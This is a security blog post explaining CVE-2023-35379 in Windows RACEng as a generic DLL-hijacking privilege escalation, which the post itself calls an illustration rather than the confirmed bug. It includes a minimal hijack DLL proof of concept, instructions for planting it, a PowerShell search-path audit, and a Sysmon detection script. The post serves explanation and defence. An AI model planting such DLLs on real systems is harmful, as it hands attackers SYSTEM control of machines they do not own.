CVE-2023-35379 - Exploiting the Reliability Analysis Metrics Calculation Engine (RACEng) Elevation of Privilege Vulnerability
The world of Windows security is always abuzz with the discovery of new vulnerabilities. In 2023, a vulnerability was disclosed in the Reliability Analysis Metrics Calculation Engine (RACEng), registered as CVE-2023-35379. This elevation of privilege (EoP) bug, if left unpatched, could let a local attacker gain SYSTEM privileges and take over the affected machine. In this post we break down what the vulnerability is, how this class of bug is exploited against a SYSTEM service, show a sample DLL payload, share the official references, and explain how to defend against it, all in plain language.
What Is the Reliability Analysis Metrics Calculation Engine (RACEng)?
RACEng, short for Reliability Analysis Metrics Calculation Engine, is part of Windows’ Reliability Analysis Component (RAC). This background service collects data about events that affect system reliability, such as application crashes, hardware failures, or system hangs. It's used to populate the "Reliability Monitor" in Windows.
Normally, RACEng runs as a service under SYSTEM permissions, making it a tempting target for escalation attacks.
What is CVE-2023-35379?
According to Microsoft, CVE-2023-35379 is an elevation of privilege vulnerability in Windows. The advisory says only that RACEng improperly handles certain operations; an attacker who can already run code on the machine can abuse that handling to execute code as SYSTEM.
In simple words: If you’re running on a vulnerable version of Windows, an attacker with regular user (non-admin) access could run code that gives them full control over the computer — all because of how RACEng works behind the scenes.
Official References
- Microsoft Advisory: https://msrc.microsoft.com/update-guide/vulnerability/CVE-2023-35379
- NVD Entry: https://nvd.nist.gov/vuln/detail/CVE-2023-35379
How Does the Exploit Work?
Microsoft's advisory does not publish the root cause or a proof of concept. For a component that runs as SYSTEM, the usual ways this class of bug is reached are loading a DLL from a location a standard user can write to, or overly permissive ACLs on files, directories or named pipes the service uses. The scenario below follows that generic pattern; treat it as an illustration of how RACEng could be abused, not as a confirmed description of the patched code path.
Attack Scenario
1. The attacker needs to be able to run code on the target machine, typically as a limited (non-admin) user.
2. The attacker plants a malicious DLL (or otherwise manipulates a component RACEng will use).
3. RACEng, running as SYSTEM, loads or accesses the attacker's file and inadvertently runs the attacker's code with SYSTEM privileges.
A Typical Attack Path
Step 1: Find Unsecure File/Folder Permissions
When a process loads a DLL by name rather than by full path, Windows walks a fixed search order: the directory the executable lives in, the system directories, and then each directory on PATH. If any directory on that list is writable by a standard user and the real DLL lives later in the order (or does not exist at all), a SYSTEM service can be fed a planted file. The same applies to data files the service reads from a user-writable location, or to a named pipe whose ACL lets any local user connect and send unsanitized input.
Step 2: Planting Malicious Code
The attacker places their own code (DLL or executable) in that location. For DLL hijacking, the payload is named exactly like the DLL RACEng resolves through the search order and sits in a directory that is searched before the legitimate copy (or in any searched directory, if the DLL is missing entirely).
Step 3: Triggering Execution
A standard user normally cannot stop or start a service directly, so the attacker waits for the component to be (re)started: a reboot, a scheduled trigger, or a log-off/log-on cycle if that is what starts it. When it starts, the loader resolves the DLL name, finds the attacker's copy first, and runs its DllMain as SYSTEM.
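The following PowerShell script is an added example, not code from the original post or from Microsoft. It carries out Step 1 above the way both an attacker and an auditor would: it reconstructs the DLL search order for a given service (executable directory, system directories, the machine-wide PATH) and reports every directory on it that a low-privileged principal can create or replace files in. The service name 'RacEng' is an assumption used only for illustration; substitute the real name from Get-Service on your build. Nothing here is RACEng-specific, so the same check applies to any service that runs as SYSTEM.

```powershell
# Added example: audit a SYSTEM service's DLL search path for directories a
# standard user can write to. Not code from the original post or from Microsoft.
# 'RacEng' is an ASSUMED service name used only for illustration.
param([string]$ServiceName = 'RacEng')

# Principals every interactive/local user belongs to
$LowPrivPrincipals = @(
    'Everyone',
    'BUILTIN\Users',
    'NT AUTHORITY\Authenticated Users',
    'NT AUTHORITY\INTERACTIVE'
)

function Test-PlantableDirectory {
    # Emits the low-privileged identities that can create/replace files in $Path;
    # emits nothing if the directory is safe (or does not exist).
    param([Parameter(Mandatory)][string]$Path)
    if (-not (Test-Path -LiteralPath $Path -PathType Container)) { return }
    $acl = Get-Acl -LiteralPath $Path
    foreach ($ace in $acl.Access) {
        if ($ace.AccessControlType -ne 'Allow') { continue }
        if ($LowPrivPrincipals -notcontains $ace.IdentityReference.Value) { continue }
        # FileSystemRights is an int flag set; 0x2 = WriteData/CreateFiles, which
        # Write, Modify and FullControl all include. ACEs may also carry the unmapped
        # generic bits GENERIC_WRITE (0x40000000) and GENERIC_ALL (0x10000000).
        $raw = [int]$ace.FileSystemRights
        if ((($raw -band 0x2) -ne 0) -or (($raw -band 0x40000000) -ne 0) -or (($raw -band 0x10000000) -ne 0)) {
            $ace.IdentityReference.Value
        }
    }
}

function Get-ServiceDllSearchPath {
    # Order the loader walks for a DLL loaded by bare name (default search mode):
    # application directory, system directories, then the machine PATH.
    param([Parameter(Mandatory)][string]$ServiceName)
    $svc = Get-CimInstance Win32_Service -Filter "Name='$ServiceName'"
    if (-not $svc) { throw "Service '$ServiceName' not found on this host" }
    # PathName may be quoted and may carry arguments; keep only the executable.
    # For svchost-hosted services this is svchost.exe; the ServiceDll's own
    # directory is not examined here.
    $exe = $svc.PathName -replace '^"([^"]+)".*$', '$1'
    $exe = $exe -replace '(?i)^(\S+\.exe).*$', '$1'
    $dirs = @((Split-Path -Parent $exe), "$env:SystemRoot\System32", $env:SystemRoot)
    $machinePath = [Environment]::GetEnvironmentVariable('Path', 'Machine')
    $dirs += ([Environment]::ExpandEnvironmentVariables($machinePath) -split ';' | Where-Object { $_ })
    $dirs | Select-Object -Unique
}

$findings = Get-ServiceDllSearchPath -ServiceName $ServiceName | ForEach-Object {
    $who = @(Test-PlantableDirectory -Path $_)
    if ($who.Count -gt 0) {
        [pscustomobject]@{ Directory = $_; WritableBy = (($who | Select-Object -Unique) -join ', ') }
    }
}
if ($findings) {
    Write-Warning "DLL search path for '$ServiceName' includes user-writable directories:"
    $findings | Format-Table -AutoSize
} else {
    Write-Host "No low-privilege-writable directories on the search path of '$ServiceName'."
}
```

Run it from an elevated prompt so Get-Acl can read every directory; a hit in the output is exactly the directory an attacker would drop evil.dll into in Step 2, and the directory whose ACL you should tighten.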
A simplified code example (DLL for DLL hijacking)
// MaliciousDll.cpp
#include <windows.h>
#include <cstdlib>   // system()

// Entry point the loader calls when the DLL is mapped into a process.
// Whatever runs here runs with the token of the loading process; if that
// process is the RACEng service, the token is SYSTEM.
BOOL APIENTRY DllMain(HMODULE hModule, DWORD ul_reason_for_call, LPVOID lpReserved)
{
    if (ul_reason_for_call == DLL_PROCESS_ATTACH) {
        // Proof-of-concept action: drop a marker file. A real payload would
        // spawn a SYSTEM shell, add an account, install persistence, etc.
        // (Spawning a process from DllMain runs under the loader lock; fine
        // for a PoC, fragile in anything else.)
        system("cmd.exe /c echo SYSTEM OWNZ > C:\\pwned.txt");
    }
    return TRUE;
}
Compile with Visual Studio, or with MinGW: g++ -shared -o evil.dll MaliciousDll.cpp
Next, drop evil.dll in a directory on RACEng's search path that standard users can write to. The next time the service starts and resolves that DLL name, the payload's DllMain runs as SYSTEM.
From there the attacker has full control of the machine and can, for example, set up persistent backdoors that survive reboots, all without the logged-on user noticing, since everything happens in the background. This is why Microsoft rates the vulnerability Important, with a CVSS 3.1 base score of 7.8.
How to Protect Yourself
- Apply Microsoft Updates: Always keep Windows up to date. The fix for this bug shipped in the August 2023 Patch Tuesday release (8 August 2023).
- Restrict Local User Permissions: Limit local account privileges wherever possible, and make sure standard users cannot write to any directory a SYSTEM service searches for DLLs.
- Monitor for Suspicious DLLs and Service Behavior: Use endpoint detection tools to watch for DLLs loaded by SYSTEM processes from user-writable locations, and for unexpected service restarts.
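For the monitoring item above, here is an added PowerShell example (not code from the original post, from Microsoft or from any EDR vendor) of the logic a detection rule would encode: a DLL loaded by a SYSTEM-context process from outside the OS-controlled directories, or an unsigned one, gets flagged. It runs first over four constructed Sysmon Event ID 7 (Image loaded) records embedded in the script, then shows how to feed it real events from the Sysmon log. The page does not name RACEng's executable, so the image filter defaults to everything; pass an -ImageFilter wildcard once you know the binary on your build.

```powershell
# Added example: flag suspicious image loads (Sysmon Event ID 7) by SYSTEM-context
# processes. Not code from the original post or from Microsoft.
$SystemRoot = if ($env:SystemRoot) { $env:SystemRoot } else { 'C:\Windows' }  # fallback so the sample runs anywhere
$TrustedRoots = @(
    "$SystemRoot\System32\",
    "$SystemRoot\SysWOW64\",
    "$SystemRoot\WinSxS\",
    'C:\Program Files\',
    'C:\Program Files (x86)\'
)

function Test-SuspiciousImageLoad {
    # $Event needs User, Image, ImageLoaded and Signed, as Sysmon Event 7 provides them.
    # Returns $true when the load should be alerted on.
    param(
        [Parameter(Mandatory)] $Event,
        [string]$ImageFilter = '*'   # narrow to one loader, e.g. '*\svchost.exe' (assumed wildcard, not RACEng's binary)
    )
    if ($Event.User -ne 'NT AUTHORITY\SYSTEM') { return $false }   # only privileged loaders matter here
    if ($Event.Image -notlike $ImageFilter) { return $false }
    $inTrusted = $false
    foreach ($root in $TrustedRoots) {
        if ($Event.ImageLoaded.StartsWith($root, [System.StringComparison]::OrdinalIgnoreCase)) {
            $inTrusted = $true
            break
        }
    }
    # Untrusted location OR unsigned image: either alone is worth an alert
    return (-not $inTrusted) -or ($Event.Signed -ne 'true')
}

# Constructed sample records (not real telemetry): a normal load, a DLL planted in
# a user-writable folder, an unsigned DLL inside System32, and a non-SYSTEM process.
$SampleEvents = @(
    [pscustomobject]@{ User = 'NT AUTHORITY\SYSTEM'; Image = "$SystemRoot\System32\svchost.exe"; ImageLoaded = "$SystemRoot\System32\kernel32.dll"; Signed = 'true'  }
    [pscustomobject]@{ User = 'NT AUTHORITY\SYSTEM'; Image = "$SystemRoot\System32\svchost.exe"; ImageLoaded = 'C:\Users\Public\evil.dll';          Signed = 'false' }
    [pscustomobject]@{ User = 'NT AUTHORITY\SYSTEM'; Image = "$SystemRoot\System32\svchost.exe"; ImageLoaded = "$SystemRoot\System32\oddball.dll";  Signed = 'false' }
    [pscustomobject]@{ User = 'LAB\alice';           Image = 'C:\Users\alice\tool.exe';           ImageLoaded = 'C:\Users\alice\plugin.dll';        Signed = 'false' }
)
$SampleEvents | Where-Object { Test-SuspiciousImageLoad -Event $_ } |
    Format-Table User, Image, ImageLoaded, Signed -AutoSize

function Get-SysmonImageLoads {
    # Pull Event ID 7 from the Sysmon log and flatten EventData into the four fields above
    param([int]$MaxEvents = 5000)
    Get-WinEvent -FilterHashtable @{ LogName = 'Microsoft-Windows-Sysmon/Operational'; Id = 7 } -MaxEvents $MaxEvents |
        ForEach-Object {
            $d = @{}
            foreach ($n in ([xml]$_.ToXml()).Event.EventData.Data) { $d[$n.Name] = $n.'#text' }
            [pscustomobject]@{ User = $d['User']; Image = $d['Image']; ImageLoaded = $d['ImageLoaded']; Signed = $d['Signed'] }
        }
}
# Live use (requires Sysmon with an ImageLoad rule and an elevated shell):
#   Get-SysmonImageLoads | Where-Object { Test-SuspiciousImageLoad -Event $_ }
# Correlate hits with service restarts: System log, Service Control Manager event 7036
#   Get-WinEvent -FilterHashtable @{ LogName = 'System'; ProviderName = 'Service Control Manager'; Id = 7036 } -MaxEvents 50
```

The two conditions are deliberately OR-ed: a planted DLL hijack shows up as a load from a user-writable path, while a tampered copy inside a system directory shows up as an unsigned image. Tune the trusted-root list to your build before turning this into an alert, or you will page on every legitimately installed third-party service.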
Conclusion
CVE-2023-35379 is a textbook example of why system services should be strictly locked down and why regular patching is so important. By exploiting something as seemingly “boring” as a reliability analysis service, attackers can gain the keys to the kingdom on your machine.
Recommendation: Patch ASAP, audit file/folder/service permissions, and pay attention to security bulletins — even for unglamorous services like RACEng.
Learn More
- Microsoft Security Response Center - CVE-2023-35379
- How Security Researchers Find EoP Bugs
Stay safe, keep your systems updated, and be aware: even small system components can hide big risks!
Timeline
Published on: 08/08/2023 18:15:00 UTC
Last modified on: 08/10/2023 18:22:00 UTC